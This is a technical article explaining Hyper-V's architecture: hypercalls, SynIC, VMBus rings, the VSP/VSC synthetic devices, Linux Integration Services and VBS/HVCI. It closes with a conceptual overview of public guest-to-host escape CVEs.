The root partition is not just another VM. It is a privileged partition: it owns the physical I/O devices, runs the parent stack of synthetic-device backends, and brokers everything that touches real hardware. Children get virtual processors and a slice of memory, and they communicate with the root over a software bus called VMBus that we will spend most of this article taking apart.

flowchart TD HW["Physical hardware (CPU, RAM, NICs, NVMe)"] HV["Hyper-V hypervisor (microkernel)"] Root["Root partition (Windows Server)"] VSP["Virtualization Service Providers (VSPs): vmswitch.sys, storvsp.sys, ..."] C1["Child partition: Windows VM"] C2["Child partition: Linux VM"] VSC1["VSCs: netvsc, storvsc, ..."] VSC2["VSCs: hv_netvsc, hv_storvsc, ..."] HW --> HV HV --> Root HV --> C1 HV --> C2 Root --> VSP VSP -. "VMBus channel" .-> VSC1 VSP -. "VMBus channel" .-> VSC2 C1 --> VSC1 C2 --> VSC2

The hypervisor itself is small by design. The Hyper-V architecture page on Microsoft Learn [@ms-hyperv-architecture-perf] describes it as a microkernel: it does the minimum a hypervisor must do (CPU scheduling, memory partitioning, interrupt routing, an inter-partition message bus) and pushes everything else, including the device models, out to the root partition. This is the opposite of the early VMware ESX design, where the hypervisor itself contained large device drivers.The microkernel choice was pragmatic, not ideological. A monolithic hypervisor with built-in NIC and storage drivers would have been a catastrophic certification problem: every NIC firmware update would risk a hypervisor patch. By delegating I/O to the Windows root partition, Microsoft re-used the entire Windows driver stack.

The split also explains why Hyper-V "feels Windows-shaped" even though it is technically not Windows. The root partition is Windows, with all of its drivers, its WMI, its event log, its Get-VM PowerShell cmdlets. The hypervisor underneath is a small, separate binary (hvix64.exe on Intel, hvax64.exe on AMD) that you almost never have a reason to think about. Microsoft itself goes further: in the same architecture document, it stresses that all device-model traffic flows through the root: "the management operating system hosts virtual service providers (VSPs) that communicate over the VMBus to handle device access requests from child partitions" (Microsoft Learn: Overview of Hyper-V [@ms-overview-hyper-v]).

This sets up the question the rest of the article answers: if the hypervisor is small, the guest is unmodified Windows or Linux, and the root partition owns the real devices, then how does a guest actually do disk and network I/O at gigabit-or-better speeds without paying enormous costs to traverse all of these boundaries?

The short answer is in three pieces: enlightenments (the guest knows it is virtualized and uses hypercalls), VMBus (the inter-partition transport), and the VSP/VSC pair (split drivers that share memory through VMBus rings). The next section starts with the first of those three.

2. Enlightenments: what "knowing you are virtualized" buys you

In the early 2000s, the dominant intuition was that a hypervisor's job is to fool the guest. A perfectly faithful emulation of an Intel 440BX motherboard, a DEC 21140 NIC, and an IDE controller is what made VMware Workstation a useful product in 1999. It is also what made Microsoft Virtual Server 2005 too slow to saturate gigabit links: every out instruction on a fake NIC port trapped to the hypervisor, was decoded against an in-memory chip model, and produced a synthetic interrupt that itself trapped on the way out. The Microsoft Virtual Server retrospective on Wikipedia [@wikipedia-virtual-server] notes that the architecture had no paravirtualization support and that performance was constrained relative to later hardware-assisted designs.

Hyper-V's answer was to drop the pretence. If the guest knows it is in a VM, it can use a fast path designed for VMs instead of pretending to drive imaginary chips. Microsoft calls this knowledge an enlightenment, and the Hyper-V feature discovery page [@ms-tlfs-feature-discovery] is the contract a guest uses to learn what enlightenments the hypervisor offers.

A modification or feature in a guest operating system that takes advantage of running under a specific hypervisor. An enlightened guest detects the hypervisor (on x86, by reading the `cpuid` leaves at `0x40000000` and above), then opts in to using paravirtual interfaces (hypercalls, synthetic timers, synthetic interrupt controllers, shared TSC pages) instead of trapping on emulated hardware. An unmodified guest would still boot, but slower.

Detection is the cheap part. The Linux kernel's Hyper-V overview document [@kernel-hyperv-overview] describes four cooperating mechanisms, layered atop one another: implicit traps that the hypervisor handles transparently, explicit hypercalls the guest issues on purpose, synthetic registers exposed as model-specific registers (MSRs) in the architectural CPU register file, and VMBus for high-bandwidth device traffic. Each layer builds on the one below it.

Key idea: The contract between Hyper-V and its guests is published. Microsoft maintains the Top-Level Functional Specification as a public document under the Open Specification Promise. That single decision is why Linux ships an in-tree Hyper-V driver stack and why VMBus is not a black box.

The hypercall page

The first thing an enlightened guest does is set up a hypercall page. The TLFS Hypercall Interface page [@ms-tlfs-hypercall] describes the dance: the guest writes its identity into HV_X64_MSR_GUEST_OS_ID (MSR 0x40000000), then writes a guest-physical address and an enable bit into HV_X64_MSR_HYPERCALL (MSR 0x40000001). The hypervisor responds by populating that page with the right opcode for the current CPU: vmcall on Intel, vmmcall on AMD. From that moment on, "make a hypercall" is a normal call into a known address rather than an opcode the kernel must hand-assemble per CPU vendor.This trick neatly externalises the vendor-specific calling convention. Microsoft can later swap to a new opcode (say, on ARM64, where the equivalent is an HVC instruction) without any guest code change. The guest just learns the new page contents.

The same TLFS page documents two hypercall classes: simple hypercalls (one operation, returns or faults) and rep (repeated) hypercalls that take a counter and a start index, so a long-running operation can yield mid-flight without losing work. Three calling conventions exist: a memory-based one for large parameter blocks, a register-only fast variant for the very common case of one or two inputs, and an XMM-register variant that lets a guest pass up to 112 bytes of input through SSE registers.

That XMM variant is unusual enough to flag. Most kernel ABIs do not touch SSE in privileged code because saving and restoring the full SSE state is expensive. Hyper-V's hypercall ABI uses XMM precisely because the round-trip cost of a hypercall is dominated by the VMEXIT itself, so squeezing a few more bytes into registers is cheaper than spilling them to memory and reading them back.

Synthetic interrupts and synthetic timers

A guest's virtual processor has its own emulated local APIC by default, but an enlightened guest can also use a Synthetic Interrupt Controller (SynIC), defined in the TLFS. Each virtual processor gets 16 SINT slots, a per-CPU shared message page, and a per-CPU shared event page. SINTs are how VMBus signals events to the guest without going through the legacy LAPIC fast path.

One of 16 logical interrupt sources per virtual processor that the Hyper-V Synthetic Interrupt Controller can signal. SINTs are reachable through MSRs (`HV_X64_MSR_SINT0` through `HV_X64_MSR_SINT15`) and back the doorbell mechanism for VMBus channels and for synthetic timers. They are paravirtual: they would not exist on a bare-metal CPU.

The clock side is even more interesting. The Linux kernel Hyper-V clocks documentation [@kernel-clocks] describes a reference TSC page that the hypervisor maintains in shared memory: it contains a scale factor and an offset such that

$$ \text{guest_time} = (\text{TSC} \times \text{scale}) >> 64 + \text{offset} $$

ticks at a constant 10 MHz frequency regardless of the underlying TSC. The guest's clock_gettime and gettimeofday can read TSC, multiply, shift, add, and return, all in user space via vDSO, with no kernel transition and no hypercall.

A web server that calls `clock_gettime` once per request, on a million-requests-per-second box, is a ridiculous workload that real systems run constantly. Without enlightenments, every call would be a `rdmsr` on a virtualised TSC or a trap into the hypervisor. With the reference TSC page, the same call is four arithmetic ops and a memory load. The kernel doc explains that this scale and offset survive live migration: "in the case of a live migration to a host with a different TSC frequency, Hyper-V adjusts the scale and offset values in the shared page so that the 10 MHz frequency is maintained" (Linux kernel: Hyper-V clocks [@kernel-clocks]).

Synthetic timers complete the picture. Each virtual CPU has four synthetic timers programmable via MSRs; they fire SINTs into the SynIC. The guest does not need to touch an emulated PIT or HPET. Combined, SynIC + synthetic timers + the reference TSC page mean that an enlightened guest can do most of its time-keeping and inter-partition signalling without ever touching the legacy interrupt/timer chip surface.

The TLFS as a contract

All of this is published. The Top-Level Functional Specification [@ms-tlfs] is the document a guest author reads to know which MSRs to write, which cpuid leaves to query, which hypercalls exist, and which features the hypervisor signals via feature flags. Microsoft maintains it under the Open Specification Promise. That promise is a deliberate contractual choice. Without it, Linux could not ship drivers/hv/ in-tree and Microsoft could not credibly claim that Linux is a first-class Hyper-V guest. The TLFS is the artefact that makes the rest of the architecture cooperative rather than reverse-engineered.

The next layer up uses these primitives to build something more ambitious: a general-purpose inter-partition transport.

3. VMBus: the inter-partition transport

If enlightenments are the alphabet, VMBus is the language that synthetic devices speak. The Linux kernel VMBus document [@kernel-vmbus] puts the definition tersely: "VMBus is a software construct provided by Hyper-V to guest VMs. It consists of a control path and common facilities used by synthetic devices that Hyper-V presents to guest VMs. The common facilities include software channels for communicating between the device driver in the guest VM and the synthetic device implementation that is part of Hyper-V, and signaling primitives to allow Hyper-V and the guest to interrupt each other."

There is a lot in that paragraph. Let me unpack it, because this is the architectural core.

A software-only inter-partition communication bus provided by Hyper-V. It has a control path (channel offer, open, close, rescind), and per-device data channels built on shared memory ring buffers. VMBus is not a real bus in any hardware sense; nothing on the PCIe topology is named VMBus. It is a contract between guest drivers and the hypervisor.

Channels and the offer protocol

Every synthetic device a guest sees corresponds to a VMBus channel. The root partition advertises (OfferChannel) the list of devices a guest is permitted to use. The guest's VMBus driver iterates the offers, matches each to a class GUID (synthetic SCSI is one GUID, synthetic NIC is another, the input-style vmbusrhid device is a third), and binds an in-kernel device driver to each one. The reverse operation, RescindChannel, lets the host revoke a device cleanly, which is what happens during live migration when an SR-IOV virtual function gets pulled out from under a running VM.

sequenceDiagram participant Root as Root partition (VSP) participant HV as Hyper-V hypervisor participant Guest as Guest VM (VSC) Root->>HV: OfferChannel(class_guid, instance_guid) HV->>Guest: ChannelOffer message via SynIC Guest->>HV: OpenChannel(ringbuf_gpa, signal_event) HV->>Root: Channel opened loop steady-state I/O Guest->>Root: write descriptor + payload to ring, signal SINT Root->>Guest: write response to ring, signal SINT end Root->>HV: RescindChannel(instance_guid) HV->>Guest: ChannelRescind via SynIC Guest->>Root: CloseChannel

Two ring buffers, one channel

Each open channel is two unidirectional ring buffers in shared memory: one for guest-to-host messages, one for host-to-guest. Each ring has a 4 KiB header page that holds the read index, the write index, and control flags, plus a power-of-two payload region. The guest tells the hypervisor which guest-physical pages back the ring through an object called a GPA Descriptor List (GPADL), built up via the vmbus_establish_gpadl API.

The kernel doc reveals a small but durable engineering detail. It maps the ring buffer twice in the guest's kernel virtual address space: header page first, ring contents next, and then the ring contents again, contiguously. Why? Because that lets a copy loop walk past the end of the ring without writing wrap-around code; the next byte after the ring's last byte is the ring's first byte, by virtual-memory arrangement. It is the same trick used inside the Linux page cache for fbdev and inside DPDK's mempool. It costs a little address space; it saves a branch on every payload byte.The Linux kernel doc is explicit that this double-mapping convenience exists in the guest only. If you are writing a userspace tool that ingests a captured VMBus ring (for forensics or debugging) you must implement wrap-around manually. This is exactly the kind of detail that source code documentation captures and prose articles forget.

The total amount of GPADL-shared memory a single guest can hold is capped per Windows version. The kernel doc records the numbers: roughly 1280 MiB on Windows Server 2019 and later, roughly 384 MiB on earlier hosts (Linux kernel: VMBus [@kernel-vmbus]). For a guest with 30+ channels (multiple netvsc subchannels, multiple storvsc subchannels, vPCI, KVP, time sync, VSS, balloon, framebuffer), that ceiling is real but not yet limiting at typical ring sizes of 1 to 16 MiB per direction.

The doorbell

Shared memory alone is not enough. The guest can write into the ring all it wants; the host will not look until it is told to. Conversely, the host can write into the ring; the guest will not check until something signals it. That signal is the doorbell, and it is implemented via the Synthetic Interrupt Controller SINTs introduced in the previous section.

When the guest enqueues a request and the host's read pointer is already chasing it (i.e., the host is still processing the last batch), the guest can suppress the doorbell entirely. Only the first request after the host has caught up triggers a hypercall. This is interrupt coalescing in software, and it is the single most important performance lever on a software data plane: the round-trip cost of a VMEXIT is amortised across many packets.

Note: This same shape, shared memory rings plus an event-channel doorbell, was the central insight of Xen's split-driver paravirtualization model in 2003 [@xen-pv-wiki]). Hyper-V's contribution was not the shape; it was packaging the shape so unmodified Windows guests could use it via in-box drivers, and publishing the protocol so unmodified Linux could too.

VSPs and VSCs

The two endpoints of a channel have specific names. The Virtualization Service Provider (VSP) is the kernel module in the root partition that owns the device backend. The Virtualization Service Client (VSC) is the guest-side driver that talks to the VSP through the channel. Microsoft's own architecture page is precise: "the Hyper-V-specific I/O architecture consists of virtualization service providers (VSPs) in the root partition and virtualization service clients (VSCs) in the child partition. Each service is exposed as a device over VM Bus, which acts as an I/O bus and enables high-performance communication between VMs that use mechanisms such as shared memory" (Microsoft Learn: Hyper-V architecture [@ms-hyperv-architecture-perf]).

**VSP** (Virtualization Service Provider): a kernel module in the root partition that exposes a synthetic device backend to guests over a VMBus channel. Examples: `vmswitch.sys` (synthetic NIC), `storvsp.sys` (synthetic SCSI), the `vmbusrhid` server (synthetic input). **VSC** (Virtualization Service Client): the matching driver in the guest that consumes the channel and presents an OS-native device interface (a NIC, a SCSI controller, a keyboard) to the rest of the kernel.

The split is symmetric in transport (both sides use the same ring) but asymmetric in trust. The VSP runs in the most privileged context on the box, the root partition's kernel. The VSC runs in a normal guest kernel. Every byte that flows from guest to host crosses a trust boundary and gets parsed by code with full system privilege. The next two sections will return to this fact at length, because it is where the security story lives.

Why this works for closed-source guests

The Xen project tried something similar in 2003 with netfront/blkfront rings and event channels, but Xen PV required a paravirtualised guest kernel: the guest had to know it was running on Xen at compile time. Closed-source guests like Windows could not be modified, so Xen's wiki [@xen-pv-wiki]) eventually documents PV-on-HVM as a workaround.

Hyper-V finessed this with hardware virtualization. The guest kernel runs unmodified inside VT-x or AMD-V; CPU-level privilege separation handles the privileged instructions. The only thing the guest needs to do to opt into VMBus is load a driver. Every supported Windows version since Windows 7 / Server 2008 R2 ships those drivers in-box. Linux ships them in-tree from kernel 2.6.32 onward. There is no separate "install paravirt drivers" step, which is why Hyper-V "just works" for almost any guest you point at it.

The transport is settled. What rides on it is a catalogue.

4. Synthetic device classes: storage, network, input, video, vPCI

A modern Hyper-V guest, on first boot, sees a small zoo of devices that have nothing to do with PC hardware. There is no IDE controller, no PS/2 keyboard, no Cirrus VGA. There is a synthetic SCSI controller, a synthetic NIC, a synthetic keyboard and mouse, a synthetic framebuffer, and (often) a synthetic PCI passthrough channel. Each is a VSP/VSC pair on top of VMBus.

The Linux kernel VMBus document [@kernel-vmbus] enumerates the catalogue: synthetic SCSI controller (storvsc), synthetic NIC (netvsc), synthetic framebuffer (synthvid), synthetic keyboard, synthetic mouse, PCI passthrough, plus the non-device services: heartbeat, time sync, shutdown, memory balloon, KVP exchange, and online backup (VSS).

flowchart LR subgraph Guest nv["netvsc (NIC)"] st["storvsc (SCSI)"] sv["synthvid (framebuffer)"] kb["hyperv-keyboard"] ms["hyperv-mouse"] pc["pci-hyperv (vPCI)"] kvp["hv_kvp (KVP)"] ts["hv_utils (timesync, shutdown, heartbeat)"] end subgraph Root vsw["vmswitch.sys"] sto["storvsp.sys"] sfb["synthvid VSP"] rhid["vmbusrhid VSP"] vpci["vPCI VSP"] kvpd["KVP daemon"] tsd["IS daemons"] end nv -- "VMBus channel" --- vsw st -- "VMBus channel(s)" --- sto sv -- "VMBus channel" --- sfb kb -- "VMBus channel" --- rhid ms -- "VMBus channel" --- rhid pc -- "VMBus channel" --- vpci kvp -- "VMBus channel" --- kvpd ts -- "VMBus channel" --- tsd

Synthetic SCSI: storvsc

The storvsc VSC presents itself to the guest as a SCSI host bus adapter. Disks attached to the VM appear as SCSI LUNs hanging off that HBA. The wire protocol uses ring buffers carrying SRB (SCSI Request Block) style commands. To scale, storvsc can open multiple sub-channels, one per host CPU, so that I/O completion interrupts and request submission spread across cores rather than serialising on a single VMBus channel.

This is also why Hyper-V's "Generation 2" VMs work. A Generation 2 VM [@ms-gen1-gen2-vms], introduced in Windows Server 2012 R2 in 2013, has no IDE controller in the boot path at all. UEFI loads the OS loader from a synthetic SCSI device, the OS loader hands off to the kernel, and the kernel binds storvsc to the same device. The legacy IDE emulator simply never runs. That removes a lot of attack surface and lets boot volumes grow up to 64 TB on VHDX.

Synthetic NIC: netvsc

netvsc is the synthetic NIC. The wire protocol historically wrapped Microsoft's NDIS-style RNDIS frames around payloads sent through the channel ring, which is why some Linux discussions mention "RNDIS frames over VMBus." The Linux driver lives in drivers/net/hyperv/ and the kernel netvsc documentation [@kernel-netvsc] describes how it can spread receive-side traffic across multiple VMBus subchannels via Receive Side Scaling.

netvsc is also the one device class where Hyper-V composes with hardware passthrough. Section 8 will take this apart in detail; for now, note that the same netvsc VSC can run alongside an SR-IOV virtual function in the guest, with netvsc acting as the slow-path failover and the VF carrying the steady-state traffic.

Synthetic input: vmbusrhid

The synthetic keyboard, the synthetic mouse, and a few related input streams ride on a server in the root partition called vmbusrhid (the name is shorthand for "VMBus relay HID"). It is a small surface in bytes, but architecturally it has the same shape as netvsc: guest-controllable messages parsed in kernel mode in the root partition. Anyone evaluating the trust boundary should treat it the same way as netvsc, even though the data rate is six orders of magnitude lower.

Note: A path that carries 100 keystrokes per second is, on the wire, almost free. As an attack surface, it is identical to a path that carries a million packets per second: both are guest-controlled bytes parsed by privileged code. Section 7 walks through why the security community treats vmbusrhid the way it treats vmswitch.sys.

Synthetic video: synthvid

synthvid is a synthetic framebuffer. It is what lets you connect to a Hyper-V VM through the Virtual Machine Connection client without dragging in an emulated VGA. It is intentionally simple: there is no 3D acceleration in the synthetic path. Workloads that need GPU acceleration use a different mechanism, vPCI / DDA, to assign a real GPU to the VM.

vPCI: synthetic PCI passthrough

The most subtle device class is pci-hyperv, which exposes a virtual PCIe topology to the guest. The Linux kernel vPCI document [@kernel-vpci] describes the trick: a passthrough device is offered to the guest initially over VMBus (the channel carries the device's PCI configuration space and BARs), and once the guest's vPCI driver has constructed a real PCI device object for it, the device dual-identifies as a normal PCIe device. The vendor driver can then load against it.

This is the mechanism behind both Hyper-V's Discrete Device Assignment (DDA) [@ms-dda] and Azure's Accelerated Networking, which we will return to in Section 8. The DDA planning document is explicit that Microsoft formally supports DDA for GPUs and NVMe storage as device classes; other PCIe devices are "likely to work" but require vendor support.

Generation-1 vs Generation-2: a quick decoder

Putting the device classes side by side clarifies why the move from Generation-1 to Generation-2 VMs simplified so much:

Element	Generation-1 VM (legacy)	Generation-2 VM (since 2013)
Firmware	BIOS	UEFI with Secure Boot
Boot disk	Emulated IDE	Synthetic SCSI (`storvsc`)
Network on boot	Emulated DEC 21140 fallback	Synthetic NIC (`netvsc`)
Input	Emulated PS/2 + `vmbusrhid`	`vmbusrhid` only
Display	Emulated VGA + `synthvid`	`synthvid` only
Max boot VHDX	2 TB	64 TB
Source	Microsoft Learn: Gen 1 vs Gen 2 [@ms-gen1-gen2-vms]	Same

Generation-2 is what the Hyper-V architecture wanted to be from the beginning: an all-synthetic stack with no fallback to imaginary 1990s chipsets. The two-generation existence was not a design preference; it was the cost of supporting older operating systems whose boot loaders only knew about BIOS and IDE. Today, every modern Windows and modern Linux supports Generation-2; Generation-1 remains for legacy guests.

Counting boundary crossings

The shape of the hot path is now visible. To send one network packet from a guest:

The guest writes one descriptor and one payload copy into the netvsc TX ring (one memory copy).
The guest possibly fires a doorbell (one hypercall, often suppressed if the host has not caught up).
The host's vmswitch.sys reaps the descriptor, parses it, and forwards it through the virtual switch to a real NIC.

A single packet's hot path is at most one hypercall and one memory copy in the guest, plus host-side ring traversal. Section 8's comparison table will quantify how this stacks up against virtio and SR-IOV, but the scale is clear: paravirt I/O on Hyper-V is orders of magnitude cheaper per packet than full PC emulation, and the gap closes only when you go all the way to hardware passthrough.

The catalogue is set. Now, who actually wrote the Linux side of all this?

5. Linux Integration Services: Microsoft writes Linux drivers

In December 2009, Microsoft did something quietly historic. Linux kernel 2.6.32 merged a set of drivers under drivers/staging/hv/, contributed by Microsoft itself, that taught the Linux kernel to be an enlightened Hyper-V guest. The kernel.org Hyper-V index page [@kernel-hyperv-index] is the maintained landing page for that work. Over the next several releases the drivers moved out of staging/, settled at drivers/hv/, drivers/net/hyperv/, drivers/scsi/storvsc_drv.c, and drivers/pci/controller/pci-hyperv.c, and became the default in every mainstream distribution.

That set of drivers is collectively called Linux Integration Services (LIS).

The set of in-kernel Hyper-V guest drivers that Microsoft contributes to upstream Linux. Includes `hv_vmbus` (the VMBus core), `hv_netvsc` (synthetic NIC), `hv_storvsc` (synthetic SCSI), `hv_utils` (KVP, time sync, shutdown, heartbeat, VSS), `pci-hyperv` (vPCI), and `hv_balloon` (memory ballooning). The same code that Microsoft maintains in the Linux tree powers Linux guests on Hyper-V on Windows Server, on Azure, and on developer Hyper-V on Windows 11.

The reason this matters is bigger than convenience. In 2009, Linux had a long, painful history with Hyper-V's competitors. VMware shipped open-vm-tools but the deepest paravirt drivers (VMXNET3, PVSCSI) lived in vendor packages. Xen's PV drivers existed in-tree but their evolution depended on Citrix and the Xen project. By contributing the full driver stack upstream and committing to keep it there, Microsoft chose a different route: they put the spec (the TLFS) and the implementation (LIS) in the open at the same time.

Microsoft did not just publish a hypervisor specification and hope Linux would adopt it. They wrote the Linux drivers themselves and upstreamed them, and then they kept doing it for fifteen years.

You can see the maintenance pattern in any current kernel. The drivers/hv/ directory has continuous commit activity from Microsoft engineers. Kernel-doc files like the VMBus [@kernel-vmbus], clocks [@kernel-clocks], vPCI [@kernel-vpci], overview [@kernel-hyperv-overview], and CoCo VM [@kernel-coco] pages are written by the same engineers who write the drivers. Several of those documents are the most lucid descriptions of the architecture that exist anywhere in public.One unexpected consequence: the Linux kernel docs are often easier to read for the architecture than Microsoft's own customer-facing docs. The customer docs answer "how do I configure this?"; the kernel docs answer "what is actually happening?" When researching this article, I found that the cleanest single description of VMBus channel lifecycle is the Linux kernel doc, not the TLFS.

What "in-box" really means

Both major guests now ship VMBus support without any post-install step:

On Windows, the VMBus client stack is built into every supported Windows version since Windows 7 / Windows Server 2008 R2. The legacy Integration Services package, which once shipped as an ISO you mounted into the VM, is no longer needed on supported Windows.
On Linux, the drivers are in-tree from kernel 2.6.32 (December 2009) onward and ship in every mainstream distro.

The kernel.org Hyper-V overview document [@kernel-hyperv-overview] explicitly warns against installing legacy LIS packages on top of a kernel that already has the in-tree drivers: it can break MSI-X handling and PCI passthrough. This is the kind of operational footgun that survives precisely because the in-box answer is correct and the LIS package is a holdover from earlier kernels.

A practical smoke test

You can confirm a Linux guest is using its enlightenments without any vendor tooling. The kernel exposes cpuid leaves and Hyper-V detection through dmesg and through /sys. A small script makes it concrete:

{ // This logic mirrors what \dmesg | grep -i hyperv` and a peek into // /sys/devices/virtual/misc/vmbus would tell you on a real Linux Hyper-V guest.

const guestObservations = { cpuidSig: '0x40000000', // Microsoft's vendor signature for Hyper-V guestOsIdMsr: 0x40000000, // HV_X64_MSR_GUEST_OS_ID, written by the guest hypercallMsr: 0x40000001, // HV_X64_MSR_HYPERCALL, returns the hypercall page vmbusModuleLoaded: true, netvscDevice: '/sys/class/net/eth0/device/driver', netvscDriverName: 'hv_netvsc', storvscModuleLoaded: true, };

function isEnlightenedHyperVGuest(o) { if (o.cpuidSig !== '0x40000000') return false; if (!o.vmbusModuleLoaded) return false; if (o.netvscDriverName !== 'hv_netvsc') return false; return true; }

console.log( isEnlightenedHyperVGuest(guestObservations) ? 'Yes: Hyper-V enlightened, using netvsc + storvsc' : 'No: running on emulated PC hardware or non-Hyper-V hypervisor' ); `}

The point is not the script itself (anyone can write a few lines of awk against dmesg); it is that the verification surface is public. The CPU vendor signature, the MSRs, the kernel module names, the /sys paths are all documented. There is nothing to reverse-engineer.

Why this earned trust

Two pieces of practical evidence persuaded the Linux community that LIS was not a strategic trap:

The drivers stayed upstream. From 2009 to the present, Microsoft has maintained the drivers/hv/ tree, responded to maintainer feedback, and shipped patches through the normal kernel process.
The TLFS stayed accurate. Successive Hyper-V releases either matched what the TLFS said or updated the TLFS. There was no second, secret protocol.

The combination put Microsoft in the unusual position of being the most open hypervisor vendor for Linux guest support. (VirtIO on KVM has a richer cross-vendor story; that comparison is Section 8.) This open posture is also what set up the 2024 OpenVMM open-sourcing as a credible move rather than a stunt.

But before we get to OpenVMM, we need to look at a different way Hyper-V matters: not just as a substrate for VMs, but as a substrate for in-VM security boundaries inside Windows itself.

6. VBS and HVCI: Hyper-V as the trust anchor inside Windows

Up to this point the article has treated Hyper-V as a virtualization product: a thing that hosts VMs. Starting in Windows 10 and Windows Server 2016 [@ms-server-2016], Microsoft began using the same hypervisor for a different job: enforcing security boundaries inside a single OS install. The umbrella name is Virtualization-Based Security (VBS).

The mechanism is simple in description and subtle in consequences. The hypervisor splits a single guest's address space into two Virtual Trust Levels (VTLs). The lower one, VTL0, runs the normal Windows kernel and user mode (this is where explorer.exe and your browser live). The higher one, VTL1, runs a much smaller stack called the Secure Kernel plus a set of isolated user-mode services called trustlets. A compromise of VTL0, even of ntoskrnl.exe, cannot read or write VTL1 memory because the hypervisor enforces that boundary using the same hardware machinery (Intel EPT / AMD NPT, plus Intel VT-d / AMD-Vi for DMA) that it uses to isolate one VM from another.

A Hyper-V construct that partitions a single guest's address space into multiple privilege tiers enforced by the hypervisor. VTL0 hosts the normal kernel and user mode; VTL1 hosts the Secure Kernel and trustlets. The hypervisor presents each VTL with its own separate set of memory mappings, system registers, and interrupt state, so code running at VTL0 cannot read VTL1's memory even if it has run-as-NT-AUTHORITY-SYSTEM privilege. flowchart TD HV["Hyper-V hypervisor"] subgraph Guest["A single Windows guest"] subgraph VTL0["VTL0 (normal world)"] User0["User mode: apps"] Kernel0["NT kernel"] end subgraph VTL1["VTL1 (secure world)"] SK["Secure Kernel"] Trustlets["Trustlets: LSAIso, BIOiso, ..."] end end HV --> Guest HV -. "EPT + IOMMU enforcement" .-> VTL0 HV -. "EPT + IOMMU enforcement" .-> VTL1 Kernel0 -. "VTL switch (hypercall)" .-> SK

What lives in VTL1

The flagship inhabitant of VTL1 is Hypervisor-protected Code Integrity (HVCI), which moves kernel-mode page-table integrity checking into the Secure Kernel. With HVCI on, no VTL0 driver can mark a kernel page as both writable and executable; the Secure Kernel mediates the page tables and refuses the request. The result is that attackers who already have code execution in the NT kernel cannot trivially load arbitrary unsigned kernel code or build new executable JIT pages on the fly.

The other tenants of VTL1 are trustlets. The most familiar is lsaiso.exe (LSA Isolation), which holds the cached domain credentials that historically lived in lsass.exe and were the prime target for tools like Mimikatz. With Credential Guard on, those secrets move to a trustlet whose memory is unreadable from VTL0; even SYSTEM-level malware in the normal world cannot extract them. Other trustlets handle biometric template storage, key isolation for code integrity policy, and similar small, security-sensitive workloads.

Why the hypervisor is the right place for this

Putting these protections inside the hypervisor rather than inside the kernel has a property that no in-kernel mitigation can match: the protected component does not share an address space with the attacker. A defence built inside ntoskrnl.exe (PatchGuard, KASLR, control-flow guard) lives in the same memory the attacker is trying to corrupt. A defence built inside VTL1 lives in memory the attacker cannot touch, because the page tables that map it are themselves invisible from VTL0.

Note: Pre-VBS Windows had decades of memory-safety bugs in the NT kernel. After VBS, exploiting one of those bugs no longer immediately yields the attacker the ability to read LSASS secrets or load arbitrary kernel code. The attacker now needs a second bug, in the much smaller Secure Kernel codebase. The defender's effective budget went up by a large multiplier without rewriting a single line of NT.

How this connects back to VMBus

VBS would not be possible without the work the previous sections described. The Secure Kernel is what runs in VTL1; it needs to communicate with VTL0 for ordinary system services (the lsaiso.exe process must respond to authentication requests from VTL0 callers, the HVCI mediator must answer page-table requests, and so on). The signalling and shared-memory primitives that make those calls cheap are the same SynIC and shared-page primitives that VMBus uses between partitions.

In other words, the architecture Microsoft built in 2008 to give a Windows VM a fast network card became, in 2016, the architecture that gives a single Windows install a security boundary stronger than its own kernel. The same hypervisor, the same trust-mediation primitives, two completely different applications.

Windows Server 2019 [@ms-server-2019] extended this further with Hyper-V isolation for containers, where a container's lightweight VM gets its own kernel inside a tiny VTL0 of its own. The pattern is consistent: every time Windows wanted a stronger isolation primitive, the answer was "use the hypervisor."

This dual-use is the reason a serious Windows security review touches the Hyper-V codebase even on machines that nobody thinks of as virtualization hosts. A Hyper-V escape (a guest-to-host VMBus exploit) is not just "an exploit against Azure"; it is also, on a typical Windows 11 desktop with VBS enabled, an exploit against the boundary that protects LSASS secrets from kernel-mode malware.

That makes the next section's question urgent: how strong is the VMBus boundary, in practice?

7. VMBus security: every message is a parser at the trust boundary

Here is the part of the architecture worth being honest about. The same property that makes VMBus fast, namely that the host-side VSP runs in the root partition's kernel and parses guest-supplied bytes directly, also makes the VSP the most consequential piece of attack surface in the entire stack. Microsoft itself prices it that way: the Hyper-V Bug Bounty Program [@ms-bounty-hyperv] pays up to USD 250,000 specifically for guest-to-host escapes that hit this surface, which is among the highest payouts Microsoft offers for any category of vulnerability.

Key idea: Every byte that crosses a VMBus channel from a guest is a byte that a kernel-mode parser in the most privileged partition on the host has to interpret. The performance argument for a software data plane and the security argument against it are the same argument, looked at from opposite directions.

The historical record

Three CVEs make the pattern concrete:

CVE-2017-0075 is the Hyper-V escape that the Qihoo 360 Vulcan Team demonstrated at Pwn2Own 2017. The NVD entry [@nvd-cve-2017-0075] describes it as a Hyper-V flaw that "allows guest OS users to execute arbitrary code on the host OS via a crafted application." The reachable code was in a VMBus message handler on the host side.
CVE-2021-28476 is the canonical example. The NVD record [@nvd-cve-2021-28476] classifies it as a critical Hyper-V remote code execution vulnerability with a CVSS score of 9.9. The Akamai writeup with Guardicore and SafeBreach [@akamai-cve-2021-28476] traces the bug to vmswitch.sys, the synthetic-NIC VSP, and shows it had been present in production since the August 2019 vmswitch build. The exploit primitive is exactly what the architecture invites: a guest crafts an OID-style RNDIS request, sends it through the netvsc VMBus channel, and the host's kernel parser misvalidates a length, producing memory corruption in the most privileged kernel on the box.
CVE-2024-21407 is a more recent Hyper-V remote code execution vulnerability patched in March 2024 (NVD [@nvd-cve-2024-21407]). Its existence demonstrates that the bug class did not vanish; the same shape (guest-controlled message, host kernel parser, escalation to host code execution) keeps reappearing.

The MSRC bounty page ranges from \$5,000 for low-impact bugs to \$250,000 for full guest-to-host escapes (Microsoft bounty page [@ms-bounty-hyperv]). That price point is not a marketing number; it is Microsoft signalling what its threat model says these bugs are worth. A defender pricing their own controls should treat any VSP code path that parses guest-controlled data as a category that justifies the same level of attention as remote internet-facing services.

Why the bug class is structural

The pattern in all three CVEs is the same:

A guest writes carefully crafted bytes into a VMBus channel ring.
The guest fires the doorbell.
The host's VSP, running in the root partition's kernel, dequeues the message.
The VSP parses the message in C or C++ kernel code.
A memory-safety mistake (length confusion, missing bounds check, integer overflow) becomes a write or read primitive in the host kernel.

There is no exotic mechanism here. The exploit surface is "kernel C code parsing untrusted input," which has been the dominant source of remote-code-execution bugs in operating systems since the 1990s. The novelty is the location: the parser sits below the most privileged supervisor on the box, with full access to every other tenant's memory.

